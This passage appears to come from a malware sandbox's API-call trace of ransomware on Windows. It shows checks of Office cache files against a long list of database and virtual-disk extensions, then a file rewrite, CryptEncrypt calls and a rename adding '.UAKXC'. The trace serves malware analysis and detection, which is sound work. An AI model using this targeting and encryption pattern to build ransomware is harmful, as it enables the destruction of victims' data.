Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".lwx") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".maf") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".maq") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mar") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mas") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mav") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mdb") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mdf") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mpd") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mrg") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mud") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mwb") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".myd") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ndf") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".nnt") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".nrmlib") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ns2") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ns3") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ns4") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".nsf") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".nv") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".nv2") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".nwdb") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".nyf") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".odb") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".oqy") returned 0x0 [0147.696] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".orx") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".owc") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".p96") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".p97") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".pan") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".pdb") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".pdm") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".pnz") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".qry") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".qvd") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".rbf") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".rctd") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".rod") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".rodx") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".rpd") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".rsd") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sbf") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".scx") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sdb") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sdc") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sdf") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sis") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".spq") returned 0x0 [0147.697] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sql") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sqlite") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sqlite3") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".te") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".temx") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".tmd") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".tps") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".trc") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".trm") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".udb") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".udl") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".usr") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".v12") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vis") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vpd") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vvv") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".wdb") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".wmdb") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".wrk") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".xdb") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".xld") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".xmlff") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".abcddb") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".abs") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".abx") returned 0x0 [0147.698] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".accdw") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".adn") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".db2") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fm5") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".hjt") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".icg") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".icr") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".kdb") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".lut") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".maw") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mdn") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".mdt") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vdi") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vhd") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vmdk") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".pvm") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vmem") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vmsn") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vmsd") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".nvram") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vmx") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".raw") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".qcow2") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".subvol") returned 0x0 [0147.699] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".bin") returned 0x0 [0147.700] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vsv") returned 0x0 [0147.700] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".avhd") returned 0x0 [0147.700] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vmrs") returned 0x0 [0147.700] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vhdx") returned 0x0 [0147.700] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".avdx") returned 0x0 [0147.700] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".vmcx") returned 0x0 [0147.700] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".iso") returned 0x0 [0147.700] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.700] WriteFile (in: hFile=0x6f0, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.702] WriteFile (in: hFile=0x6f0, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.702] SetEndOfFile (hFile=0x6f0) returned 1 [0147.702] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.702] ReadFile (in: hFile=0x6f0, lpBuffer=0x4610000, nNumberOfBytesToRead=0x61d, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x61d, lpOverlapped=0x0) returned 1 [0147.702] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.702] WriteFile (in: hFile=0x6f0, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x61d, lpOverlapped=0x0) returned 1 [0147.702] CloseHandle (hObject=0x6f0) returned 1 [0147.703] GetProcessHeap () returned 0xea0000 [0147.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0147.704] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" [0147.704] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.UAKXC" [0147.704] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.uakxc")) returned 1 [0147.705] GetProcessHeap () returned 0xea0000 [0147.705] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0147.706] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3fa8 | out: hHeap=0xea0000) returned 1 [0147.706] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3028 | out: hHeap=0xea0000) returned 1 [0147.706] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0147.706] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0147.706] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0147.706] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 0x2020 [0147.707] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0147.707] GetLastError () returned 0x0 [0147.707] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=1450) returned 1 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".4dd") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".4dl") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".accdb") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".accdc") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".accde") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".accdr") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".accdt") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".accft") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".adb") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ade") returned 0x0 [0147.707] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".adf") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".adp") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".arc") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ora") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".alf") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ask") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".btr") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".bdf") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".cat") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".cdb") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ckp") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".cma") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".cpd") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dacpac") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dad") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".daschema") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", 